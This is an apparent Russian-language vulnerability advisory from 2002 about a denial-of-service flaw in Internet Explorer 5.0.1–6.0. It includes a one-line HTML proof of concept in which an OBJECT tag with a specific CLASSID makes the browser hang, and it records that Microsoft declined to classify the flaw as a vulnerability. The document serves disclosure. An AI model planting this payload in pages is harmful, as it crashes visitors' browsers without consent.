DoS против Microsoft Internet Explorer
| Дата публикации: | 28.06.2002 |
| Всего просмотров: | 1123 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Web страница, содержащая определенное значение CLASSID в тэге OBJECT, приведет к зависанию IE. Пример:
<!-- start dosIE-doe.html --> <object ID="dosIE-doe" CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object> <!-- end dosIE-doe.html -->Microsoft посчитала что этот недостаток не является уязвимостью защиты и сослалась на собственное определение, что такое уязвимость: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp Уязвимость обнаружена в Microsoft Internet Explorer 5.0.1 SP2-6.0 |
| Ссылки: | A DoS against IE in W2K and XP? You Make the Call... |